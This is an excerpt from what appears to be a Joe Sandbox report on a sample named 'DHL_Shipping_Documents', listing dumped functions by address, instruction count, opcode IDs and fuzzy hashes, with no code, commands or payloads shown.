Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daee4a0227d7ebb9bd831984223378cc8b5fdcd7c0ebc1848a11b929fea2f984
Instruction ID: 435c71e448436ea01c0ecf028ff34f8a96a36e80294c993446b8bfc5e3d2d27f
Opcode Fuzzy Hash: daee4a0227d7ebb9bd831984223378cc8b5fdcd7c0ebc1848a11b929fea2f984
Instruction Fuzzy Hash: D6819F36A0020A8FDF19CF99C480AAEBBF6BF94310F198569D915AF384D774E902CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0150E244 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ab3f751f36dee602a3ad30341912782d12a7b4f417f964ebcde9068f88fc154
Instruction ID: 62f3aa3d46016543a16f8cbedbf02a9f50b7bd2e352dd13d7d14783ade282733
Opcode Fuzzy Hash: 1ab3f751f36dee602a3ad30341912782d12a7b4f417f964ebcde9068f88fc154
Instruction Fuzzy Hash: 7D812271900609AFDB16CFE9C981BDEBBFAFF88354F244829E555AB250D730AC45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 014EC590 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f52a55260e3d6348dec433e047ac86589a1ad9455f543adcaf9dd210eff3718c
Instruction ID: 51f07f9467dc4ecfcfe90db6c76e0561616ceff8658efed97dfe831e9edab764
Opcode Fuzzy Hash: f52a55260e3d6348dec433e047ac86589a1ad9455f543adcaf9dd210eff3718c
Instruction Fuzzy Hash: 5371CE758016699FCB268F58C8947FEBBF4FF88711F15421AE852AF360D330A901CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01568A4B Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b9fb6b34321ea3eb3379bf90109ce7f6951358706f023e7bc2953d60c9a471f
Instruction ID: 3399c5fb9242b1e27b2f24b489bb85827aece27daca224408e744893e5b5a2b7
Opcode Fuzzy Hash: 7b9fb6b34321ea3eb3379bf90109ce7f6951358706f023e7bc2953d60c9a471f
Instruction Fuzzy Hash: 2B71BDB490425A9FDB15CF59C440ABEBBF9FF45304B0880A9E998DF215E339EA45C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 01584460 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 517784ad0758890239c2e78903d8ef694d255aad9a4348c413d7612416602a66
Instruction ID: a47f0b693faeaf1226798b046126e31d0c22f7f243b05171a37020a51cfa9277
Opcode Fuzzy Hash: 517784ad0758890239c2e78903d8ef694d255aad9a4348c413d7612416602a66
Instruction Fuzzy Hash: 1A719AB0900206EFEB20FF99D984A9ABBF8FF81700B15405AEA01EF355D7309A85DB54

Uniqueness

Uniqueness Score: -1.00%

Function 014E255B Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b59d866e0696f9f61d9677daeea42000f40d73589bf6e08c699b59027bb6f18
Instruction ID: 8cc01922a9ab2b6535adb6e3834398b10cda6501161c49617b1908e506130309
Opcode Fuzzy Hash: 5b59d866e0696f9f61d9677daeea42000f40d73589bf6e08c699b59027bb6f18
Instruction Fuzzy Hash: FC7101316042429FD711DF2CC484F2AB7E9FF98301F0585AAE859CB362DB74D946CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0155001C Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e4390e14878a9c603aeb1a8018c444fe200b5ffe4b47456f235e7577342de1b
Instruction ID: c86ea3804ba5152fd4a9b55b6f65babfdf49d32d970b36594b2e22e94ffebd12
Opcode Fuzzy Hash: 2e4390e14878a9c603aeb1a8018c444fe200b5ffe4b47456f235e7577342de1b
Instruction Fuzzy Hash: 3A716171D0060AEFDB11DFA9C954E9EBBF8FF94704F14446AE905AB290DB30EA01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 014D8A00 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cca6a4ac3611c961629bd2a3cc739276d7c46745d5b593a9e2cad57c98083048
Instruction ID: c3ec161b64ae582df2ab3f2055890b5e1fee91aa42cff286a93ef23b3fcbd7cb
Opcode Fuzzy Hash: cca6a4ac3611c961629bd2a3cc739276d7c46745d5b593a9e2cad57c98083048
Instruction Fuzzy Hash: F7819032A04A178FDF25CF98C9A4BAEB7B1BB84310F16412EE911AF395D7749D41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01598A6E Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bab579ad9ea29d357c7707b6dbb531e7863b925889ccf44ae32102a6db53770c
Instruction ID: 43bf054bae5f95bfd485230e6ae63a5d94c5ca2ca64c8642ef10f44dd77a2fef
Opcode Fuzzy Hash: bab579ad9ea29d357c7707b6dbb531e7863b925889ccf44ae32102a6db53770c
Instruction Fuzzy Hash: AA51B4B16047069FDB11DF28C840BABB7E5FF85354F04892DF9959B290DB34E909CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01578020 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47d75cd7fdee0cf02c65cb9e8bd5a10814f738f36200408ab1518d1de80dbacf
Instruction ID: de231512ec21a80bbb9a325f13a6f51b5242e2b760eb35801dc2a71646779cb8
Opcode Fuzzy Hash: 47d75cd7fdee0cf02c65cb9e8bd5a10814f738f36200408ab1518d1de80dbacf
Instruction Fuzzy Hash: 58519070900705DFD721DFAAE889B6BFBF8BF94710F104A1EE2629B6A0D770A545CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0150E403 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 24070eb9f727786168509804442034c0e513293744773e5df2d3e79550e103da
Instruction ID: 465af6e42cd4a3b2c11920c090b091249776003666cbc2efd8b37d33979ea407
Opcode Fuzzy Hash: 24070eb9f727786168509804442034c0e513293744773e5df2d3e79550e103da
Instruction Fuzzy Hash: D2518C31600A06DFDB23DFA9C991E6AB3F9FB58744F11086EE6569B2A1D734E900CB50

Uniqueness

Uniqueness Score: -1.00%

Function 014F4511 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 191a54b94049edab8bae514f61745f9a9e51e7498e7670db3c58f29478cb5baf
Instruction ID: c3f2cd5388544f77fe9e479235853cd1ef34614461f2fee4d01c019ff2b3063a
Opcode Fuzzy Hash: 191a54b94049edab8bae514f61745f9a9e51e7498e7670db3c58f29478cb5baf
Instruction Fuzzy Hash: C9518371E0061AABEF15CF95C440BEFBBB5AF44314F08406EEA05AB350DB38DA45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0155E6B0 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f9e7e25fe99ba569acd20724923416d68bd9712ec135416d680d543ea06d4628
Instruction ID: e90c1f077929b24d42ef33fde924d053d83a11805c347564c9c49aeb17c7552d
Opcode Fuzzy Hash: f9e7e25fe99ba569acd20724923416d68bd9712ec135416d680d543ea06d4628
Instruction Fuzzy Hash: 0851A531D0021AEBEF619E94C8A6BAEFBB9FB50324F154666DD116F190D730AF408B90

Uniqueness

Uniqueness Score: -1.00%

Function 015987E8 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 268c4ef46f62ed66e60b3bf8e3e89b889b3fb3c93b836141913daf71fad6d26b
Instruction ID: e8cb832300ce3f3360a3e379cf488364b4e8a859c0f5c34770c1bbd30e497732
Opcode Fuzzy Hash: 268c4ef46f62ed66e60b3bf8e3e89b889b3fb3c93b836141913daf71fad6d26b
Instruction Fuzzy Hash: 7441C57170061A9BEF25DA2DD894B7FBBDAFFD2610F084519E9598F280DB34D801C6A3

Uniqueness

Uniqueness Score: -1.00%

Function 0155C8C0 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca78dd9e5650ba4e9b4d6b02f22bb6c1a0fe2a4b164441697f51f2253ca19cf6
Instruction ID: 11a5448fb2b1e8dd73e45364165c1512772b26d8f6754353249e56be783d6c11
Opcode Fuzzy Hash: ca78dd9e5650ba4e9b4d6b02f22bb6c1a0fe2a4b164441697f51f2253ca19cf6
Instruction Fuzzy Hash: EC51CE7290031ADFCB60CFA9C4A09AEBBF9FB58314B11451AD952AB301D770BE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0150CBC0 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60da1e608099a208283b448df28b29dc39bfd404b34173293ad61db3fdb26b5a
Instruction ID: 144b58ca4c9be228e1d2478784dc4ccba40aa648313c24b870d77181108f9223
Opcode Fuzzy Hash: 60da1e608099a208283b448df28b29dc39bfd404b34173293ad61db3fdb26b5a
Instruction Fuzzy Hash: 5451E630200206CBEB37DEDCE56162D77A1FB43618F1886AEE952CF2D2D231C492E651

Uniqueness

Uniqueness Score: -1.00%

Function 0150A3F0 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bfd0b08fd3d92c23e6ded7fa2e25b5874e512b424e28a5e8cd42adb953f9c9f
Instruction ID: dea62bfaf3cc9e77285a80e62db26093831eb2ca917644f7dcad7519f2fddbae
Opcode Fuzzy Hash: 5bfd0b08fd3d92c23e6ded7fa2e25b5874e512b424e28a5e8cd42adb953f9c9f
Instruction Fuzzy Hash: D64147B16007029FDB2BEFACD881B6A77A6FB55708F02042DE9569F285D6B1D800C790

Uniqueness

Uniqueness Score: -1.00%

Function 0159A693 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a05cc02486f4377909951a3abe5148fb68eb1374065d79ff5bd90c440e2976f
Instruction ID: 7c435385970d5827244bc176623f967044d29d08b6a4922722ae0436ff55d91b
Opcode Fuzzy Hash: 2a05cc02486f4377909951a3abe5148fb68eb1374065d79ff5bd90c440e2976f
Instruction Fuzzy Hash: 8641E972A047169FDF15CF29C895A6EB7E9FF80254B04452EE9528F240EB70ED14C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 015001A8 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 812c9bf194914d32b442fd4418d773693d7ea8dbd973052e4458844f44bc3e1c
Instruction ID: 01fd9f6e49507d50a580404fea175e794d53ca6b6a3b3b3abf09913925535064
Opcode Fuzzy Hash: 812c9bf194914d32b442fd4418d773693d7ea8dbd973052e4458844f44bc3e1c
Instruction Fuzzy Hash: 1A41AB3290021ADBDF16DFD8C440BEEBBB5BF98644F14416AF905AB2D0E7359D41CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 014FEBAC Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6bbcc866bed2fe43bce86a8545349e0d385915944443763306001d4a1bfb942
Instruction ID: bb3d090f6c618b3260ba9e64390ffff70c1e5e97ee9ac97d2e4923c758f7f802
Opcode Fuzzy Hash: d6bbcc866bed2fe43bce86a8545349e0d385915944443763306001d4a1bfb942
Instruction Fuzzy Hash: 6E41D0726043468FD720DF29C884A2BB7E9FB98219F02482FFA56DB331D770E4458B51

Uniqueness

Uniqueness Score: -1.00%

Function 01512710 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 719d0d3138f5ed94eac427c532ab8038111d6087fc52808c1edbac952ed588d9
Instruction ID: 94fe53ea2fbec1bd6c348550cf7391644110e89e8a6be3b86f7bf1d4c66dd3bc
Opcode Fuzzy Hash: 719d0d3138f5ed94eac427c532ab8038111d6087fc52808c1edbac952ed588d9
Instruction Fuzzy Hash: 7A517B75A00215CFCB55CF59C480AAEF7F2FF88718F2885A9D816AB351D770AE81DB90

Uniqueness

Uniqueness Score: -1.00%

Function 014D60B4 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe41d0f18852adeb18d05fc773c42a711effa2fe5205e3c1309242ae2374c3ae
Instruction ID: 25c465a8fc6240a5b00cc8c47cdfce6d3c26532655ff1e9c22340ef5c351964d
Opcode Fuzzy Hash: fe41d0f18852adeb18d05fc773c42a711effa2fe5205e3c1309242ae2374c3ae
Instruction Fuzzy Hash: A2519F70A402069FDF26CB68CC14BADB7B5FB55314F1582AAE1199B2E2D7749981CF80

Uniqueness

Uniqueness Score: -1.00%

Function 014D0B2D Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a9ca4f9098826b2c5e548bb50a2b63d137cddcd2656f1b96b1432d6a7cc4b1a
Instruction ID: 7a57619bc3a6e75759c7cd06e81c94e355a45fe714a003a01de947213c065662
Opcode Fuzzy Hash: 8a9ca4f9098826b2c5e548bb50a2b63d137cddcd2656f1b96b1432d6a7cc4b1a
Instruction Fuzzy Hash: 4441A032A402299BDF21DF68C955BEE77B8FF55700F4100AAE908AB251D774DE81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0159832E Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1a3ad3a181cf001a64175be87df968e7f68b632ef1ef33af84e51d0fc59335a
Instruction ID: d9b291f918721dafc49a26b340581016d7c17ccbcb594b91efc74940057c63d2
Opcode Fuzzy Hash: c1a3ad3a181cf001a64175be87df968e7f68b632ef1ef33af84e51d0fc59335a
Instruction Fuzzy Hash: 6D41C471B0020AAFDF15DF9DCC85AAFBBBABF99610F144069E904AB351D670DE0487A1

Uniqueness

Uniqueness Score: -1.00%

Function 014D07E7 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33aa49707672ce7f4e24d66245ff18d58a1a560b2f7da46280afa08ed46e49e9
Instruction ID: 29e8cb8577ca2bd6b2fc9c740f219919b7f7bfb9d72260864c6d74fb5bbc6448
Opcode Fuzzy Hash: 33aa49707672ce7f4e24d66245ff18d58a1a560b2f7da46280afa08ed46e49e9
Instruction Fuzzy Hash: 9B41BE716007029FDB25CF29C4A1A26BBF9FF88314B14496FF94787A60E770E846CB90

Uniqueness

Uniqueness Score: -1.00%

Function 014FA3D0 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1127e8f611e2b5d59561e6b97b33a27a3974ae95d0aca18d8e9914b2cde24e03
Instruction ID: 04c32ecee7fcab39e6e9e518ff5f6d5c6b32b8bdfcd0097ddd1bdcf3b66061c9
Opcode Fuzzy Hash: 1127e8f611e2b5d59561e6b97b33a27a3974ae95d0aca18d8e9914b2cde24e03
Instruction Fuzzy Hash: BF41CF31A40606CFDB22CF68D859BEE7BF0FB58314F25016ED625AB3A1DB349905CB60

Uniqueness

Uniqueness Score: -1.00%

Function 014D8B50 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90d6c761a095d99fb5ba2b94fac3460a268e526a4e0833a692675d26be34bfa7
Instruction ID: 5c19ed5611f1cb3a380ef071341e99a8e8b44996c356f70409d98d0fb2a0804d
Opcode Fuzzy Hash: 90d6c761a095d99fb5ba2b94fac3460a268e526a4e0833a692675d26be34bfa7
Instruction Fuzzy Hash: 0341FF72A00607CFCB248F49C8A4AAEBBB5FB94A04F15802EE5219F365D775D802CB90

Uniqueness

Uniqueness Score: -1.00%

Function 014C88C8 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5094699f7795066183855f92b5a12a42dfe6dcedccdaddb11738cbe54406cdfc
Instruction ID: 9d0b581e8ef557721ef9161ded2ee87da82b84d3559e634216480c11439db027
Opcode Fuzzy Hash: 5094699f7795066183855f92b5a12a42dfe6dcedccdaddb11738cbe54406cdfc
Instruction Fuzzy Hash: C1416F365083169ED312DF65C840A6BB7E9BF84B54F01092FFA94D7260E770DE158B93

Uniqueness

Uniqueness Score: -1.00%

Function 014D090D Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e0ebe434463a26d89411f62e8b3b5579e5c42069778d1f59c7232a76c6478f8
Instruction ID: 0284c2c8893cbfd774d5bb05428e5e9c8e4e1ce5d5f95fd129bf8d27817b4d01
Opcode Fuzzy Hash: 8e0ebe434463a26d89411f62e8b3b5579e5c42069778d1f59c7232a76c6478f8
Instruction Fuzzy Hash: C6415871600605EFEB21DF29C850B6ABBE4FF64314F20896BE4498B361E770E942CB91

Uniqueness

Uniqueness Score: -1.00%

Function 015006C0 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03b63300fd9994ab850ef5b3b50a4364cfb448ec05a44a4460c1f8aabb960443
Instruction ID: f35877ec5038d0c54a609e71516ee1fb270ef4f3bb3aa602c8e3e571addcb5f9
Opcode Fuzzy Hash: 03b63300fd9994ab850ef5b3b50a4364cfb448ec05a44a4460c1f8aabb960443
Instruction Fuzzy Hash: 79411675A00605EFDB25CF98C980BAABBF9FB08740B20496DE256DB290D334EA45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 014D258C Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93f1acb2b29d2b5ecde3fcb7928bbe8156fe364538d9db8717044eb1d35d3754
Instruction ID: b1277cf3a26e2e7de76d45d3fb75e492142168c82fff44845194601bb2a876c9
Opcode Fuzzy Hash: 93f1acb2b29d2b5ecde3fcb7928bbe8156fe364538d9db8717044eb1d35d3754
Instruction Fuzzy Hash: 29419CB1501705CFCB22DF69D860A5AB7F1FF94314F5186AFC01A9B7A1EBB0AA41CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0150C8B9 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5f9380c3a77c64ac19ab3fa7ba8da6971b830a4aabcea09e31aaac5ee773f33
Instruction ID: 5c821d25fdd71e663f494bd682cf4fb5263f948e8ffd2fc93a6986fbe59e37ab
Opcode Fuzzy Hash: b5f9380c3a77c64ac19ab3fa7ba8da6971b830a4aabcea09e31aaac5ee773f33
Instruction Fuzzy Hash: 60317AB2A00705DFDB12CF98D440799BBF4FB59714F2085AED109EF291D376AA02CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01550483 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1eba123ea2f6e64ca6df53eb37c4de2a0d296adaace5ce911e578b945e1b81a7
Instruction ID: c42468e8a5dd0e6f5a279d52a152a8af80d0e8d59b727a6e4ac943dbd1159a05
Opcode Fuzzy Hash: 1eba123ea2f6e64ca6df53eb37c4de2a0d296adaace5ce911e578b945e1b81a7
Instruction Fuzzy Hash: 0C418CB25083419FD360DF29C845B9BBBE8FF88754F104A2EF998DB290D7709905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 015A2B0F Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5465e852439f3b18202241accbe6b43b19b17928b47db09d4717213509eb910
Instruction ID: 931292b4ae5cf7dbc9a3a6d9ccd5e885df925ff726c1e0d477135d4139b74994
Opcode Fuzzy Hash: f5465e852439f3b18202241accbe6b43b19b17928b47db09d4717213509eb910
Instruction Fuzzy Hash: 4D419272A4010AEFCB15CF98C9C1AAEBBB5FF94754F248069E905AF351D731EA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 014C8050 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a059bba86dbfb8d2ab7f815ad2c1ef34538d551b065a77c75179118f488896e
Instruction ID: 2e7425724eb2669d00ccaad991a52b16b2f451598f7e65e1ae4d25243afc2254
Opcode Fuzzy Hash: 2a059bba86dbfb8d2ab7f815ad2c1ef34538d551b065a77c75179118f488896e
Instruction Fuzzy Hash: 0A41C375904517AFCB51DF59C8806AAB7F1BF94A60F11822FD815AB7A0DF30AD428BD0

Uniqueness

